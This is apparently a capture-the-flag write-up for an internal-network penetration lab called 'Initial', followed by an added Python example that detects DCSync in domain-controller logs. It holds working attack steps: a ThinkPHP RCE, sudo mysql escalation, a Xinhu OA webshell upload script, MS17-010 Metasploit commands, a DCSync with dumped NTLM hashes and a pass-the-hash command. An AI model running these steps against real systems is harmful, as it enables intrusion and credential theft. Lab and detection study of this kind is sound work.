Initial

Target overview:

Initial is a lab environment rated easy; completing the challenge gives players a first look at the basic workflow of internal network penetration. The lab has a single flag, with its parts located on different machines.

Entry point: port scan with fscan

Result:

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
start infoscan
(icmp) Target 39.98.227.140   is alive
[*] Icmp alive hosts len is: 1
39.98.227.140:22 open
39.98.227.140:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle: http://39.98.227.140      code:200 len:5578   title:Bootstrap Material Admin
[+] http://39.98.227.140 poc-yaml-thinkphp5023-method-rce poc1
已完成 2/2
[*] 扫描结束,耗时: 13.9123559s

The host is vulnerable to the ThinkPHP 5.0.23 RCE; exploit it directly and write a webshell.

Internal network scan results:

172.22.1.2:88 open
172.22.1.18:3306 open
172.22.1.15:22 open
172.22.1.2:139 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.18:139 open
[+] NetInfo:
[*]172.22.1.18
   [->]XIAORANG-OA01
   [->]172.22.1.18
[+] NetInfo:
[*]172.22.1.2
   [->]DC01
   [->]172.22.1.2
[+] NetInfo:
[*]172.22.1.21
   [->]XIAORANG-WIN7
   [->]172.22.1.21
[*] WebTitle:http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[*] 172.22.1.21          XIAORANG\XIAORANG-WIN7     Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[+] 172.22.1.21    MS17-010    (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] 172.22.1.2  (Windows Server 2016 Datacenter 14393)
[*] 172.22.1.2     [+]DC XIAORANG\DC01              Windows Server 2016 Datacenter 14393
[*] 172.22.1.18          XIAORANG\XIAORANG-OA01     Windows Server 2012 R2 Datacenter 9600
[*] WebTitle:http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle:http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统

The first machine requires privilege escalation. First check for SUID binaries: find / -user root -perm /4000 2>/dev/null

sudo is present. sudo -l shows that mysql can be run as root without a password.

Escalate directly through mysql: sudo mysql -e '\! cmd'

sudo mysql -e '\! find / -name flag'

sudo mysql -e '\! cat /root/flag/flag01.txt'

This yields the first part of the flag.

The Xinhu OA (信呼) system has a weak password: admin/admin123

The Xinhu OA also has an RCE:

EXP:

import requests

session = requests.session()
url_pre = 'http://172.22.1.18'
# Step 1: log in with the weak credentials admin/admin123 (the form sends them base64-encoded)
url1 = url_pre + '/?a=check&m=login&d=&ajaxbool=true&rnd=533953'
# Step 2: upload the PHP file through the public upload handler
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=::',   # base64("admin") with the suffix the login form expects
    'adminpass': 'YWRtaW4xMjM=', # base64("admin123")
    'yanzm': ''
}
r = session.post(url1, data=data1)
with open('1.php', 'rb') as f:   # the webshell to upload; open in binary mode
    r = session.post(url2, files={'file': f})
upload = r.json()
# The upload is stored as *.uptemp; derive the .php path it will be reachable at
filepath = "/" + str(upload['filepath']).split('.uptemp')[0] + '.php'
file_id = upload['id']
# Step 3: run the task for the uploaded file id, after which the upload is served at the .php path
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={file_id}'
r = session.get(url3)
r = session.get(url_pre + filepath)
print(r.text)
print(url_pre + filepath)


After uploading the shell, the second part of the flag is found in C:/Users/Administrator/flag/

172.22.1.21 is vulnerable to MS17-010; exploit it directly

search ms17
use 0
set payload windows/x64/meterpreter/bind_tcp_uuid
set rhost 172.22.1.21
exploit -j

After the session comes back, use kiwi to run a DCSync

session -1
use kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv

This gives:

502     krbtgt  fb812eea13a18b7fcdb8e6d67ddc205b        514
1106    Marcus  e07510a4284b3c97c8e7dee970918c5c        512
1107    Charles f6a9881cd5ae709abb4ac9ab87f24617        512
500     Administrator   10cf89a850fb1cdbe6bb432b859164c8        512
1000    DC01$   c4459ccfe941bc3a1835c72070324266        532480
1104    XIAORANG-OA01$  7d89a53f96224552d90bcc58cc6c6711        4096
1108    XIAORANG-WIN7$  e41d4ce40648363b3cae0236d902260a        4096
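As an added detection-side example (not part of the original writeup), the following Python flags the DCSync step above in domain-controller audit logs: event 4662 records whose Properties list the DS-Replication-Get-Changes extended rights, requested by a principal that is not a domain controller account. The record layout and the sample events are constructed assumptions, not logs from the lab.

```python
# Added detection example (not from the writeup): flag DCSync-style replication
# requests in Windows Security event 4662 records. The sample records below are
# constructed; field names mirror 4662's EventData (SubjectUserName, Properties).

# Extended-right GUIDs that a replication request (what lsadump::dcsync issues)
# carries in the Properties field of event 4662.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}

def is_replication_request(event):
    """True if the record is a 4662 that requests any DS replication right."""
    if event.get("EventID") != 4662:
        return False
    props = event.get("Properties", "").lower()
    return any(guid in props for guid in REPLICATION_RIGHTS)

def is_suspicious_dcsync(event, dc_accounts):
    """True when a replication request does not come from a known DC computer
    account. A non-DC machine account (e.g. XIAORANG-WIN7$ after a SYSTEM-level
    compromise) must still be flagged, so use an allow-list, not 'ends with $'."""
    if not is_replication_request(event):
        return False
    allowed = {a.upper() for a in dc_accounts}
    return event.get("SubjectUserName", "").upper() not in allowed

def find_dcsync(events, dc_accounts):
    """Return the records that look like a DCSync from a non-DC principal."""
    return [e for e in events if is_suspicious_dcsync(e, dc_accounts)]

# Constructed sample records named after the lab's domain (XIAORANG, DC01).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "SubjectDomainName": "XIAORANG",
     "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "XIAORANG-WIN7$", "SubjectDomainName": "XIAORANG",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "Marcus", "SubjectDomainName": "XIAORANG",
     "Properties": "%%7688 {bf967aba-0de6-11d0-a285-00aa003049e2}"},  # plain object read
    {"EventID": 4624, "SubjectUserName": "Charles", "SubjectDomainName": "XIAORANG"},
]

if __name__ == "__main__":
    for e in find_dcsync(SAMPLE_EVENTS, {"DC01$"}):
        print("possible DCSync:", e["SubjectDomainName"] + "\\" + e["SubjectUserName"])
```

Only the record from XIAORANG-WIN7$ is reported: DC01$ is a legitimate replication partner, Marcus reads an object without replication rights, and the 4624 logon is not a 4662 at all.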

Pass-the-hash against the DC then yields the last part of the flag

proxychains4 psexec.py administrator@172.22.1.2 -hashes :10cf89a850fb1cdbe6bb432b859164c8 -codec gbk